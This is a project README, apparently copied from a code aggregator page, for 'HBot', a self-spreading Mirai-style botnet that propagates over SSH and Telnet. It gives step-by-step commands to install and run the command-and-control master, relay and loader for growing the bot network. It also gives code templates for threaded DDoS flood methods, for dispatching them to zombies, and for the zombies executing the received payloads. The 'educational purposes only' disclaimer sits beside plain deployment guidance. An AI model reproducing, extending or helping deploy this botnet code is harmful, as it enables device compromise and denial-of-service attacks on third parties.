HBot Save Abandoned

🐛 Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol. Modern script fullly written in python3.

Project README

HBot

Self spreading Botnet based on Mirai C&C Arch, spreading through SSH and Telnet protocol.
Modern script fullly written in python3.





Warning.

  • This project was made for educational purposes only! I take no responsibility for anything you do with this program.
  • If you have any suggestions, problems, open a problem (if it is an error, you must be sure to look if you can solve it with Google!)

Requirements.

  • A Brain, yes skiddie, you need to use your brain, but d'ont worry because Google is your best friend !
  • A MongoDB account, you must create an cluster with database, show tutorial.
  • A Ngrok account, (save your api-key)
  • 3 Open port. Default: 8080, 1337, 667
  • VPS with Debian based distribution.
  • Time..

How to setup.

for the moment you can use that: https://github.com/Its-Vichy/Mirkat

  • Change the permissions of the scripts with the chmod command.
chmod +x ./script/*.sh
  • Run installation script.
./Install.sh
  • Start C&C Master server.
./RunMaster.sh
  • Start Relay server.
  • Note: If you have more than one VPS, you can run relay on other server.
./RunMaster.sh
  • When you have enough new bots, you can expand your network by starting the loader.
./Loader.sh

Custom payload.

If you whant to share your methods, just create pull requests <3

  1. Create your method with the template (#1)
  2. You need to add your method in class Zombie (cnc.py / #2)
  3. If you whant to add module (no pypi) you need to follow #3 in zombie.py
  • #1:
import socket, threading, time

__THREAD_NUMBER__ = 500

def method_name(ip: str, port: str, timeout: str):
    def flood(ip: str, port: int, timeout: int):
        start_time = int(time.time())

        while int(time.time()) - start_time < timeout:
            # write method code here
            # Exemple: https://github.com/Its-Vichy/HBot/blob/main/src/payload/http_flood.py

    for _ in range(int(__THREAD_NUMBER__)):
        threading.Thread(target= flood, args=(ip, int(port), int(timeout))).start()

method_name('!ip!', '!port!', '!time!')
  • #2:
def ddos_payload(self, ip: str, port: str, timeout: str, type: str):
    if type == 'http':
        payload = self.parse_method('./payload/http_flood.py', ip, port, timeout)
    
    if type == 'your method name without space lmao':
        payload = self.parse_method('./payload/your_method_file.py', ip, port, timeout)
        
    self.send(f'run|{payload}')
  • #3
# Just look for this line
# add: 'module_name': module_name
# Ex: 'random': random
threading.Thread(target= exec, args=(payload, {'threading': threading, 'socket': socket, 'time': time, 'module_name': module_name})).start()

How is working.

  • Loader: soon..
  • Relay: soon..
  • C&C: soon..

Support me.

  • ⚠️ If this repository was empty, its because the project stay in developpement.
  • Thanks for looking at this repository, if you like to press the ⭐ button!
  • Made with 💖 by Vichy.
  • RCΛ Love u.

Informations
GitHub Repo stars GitHub top language GitHub last commit GitHub GitHub watchers

Open Source Agenda is not affiliated with "HBot" Project. README Source: Its-Vichy/HBot
Stars
138
Open Issues
2
Last Commit
1 year ago
License

Open Source Agenda Badge

Open Source Agenda Rating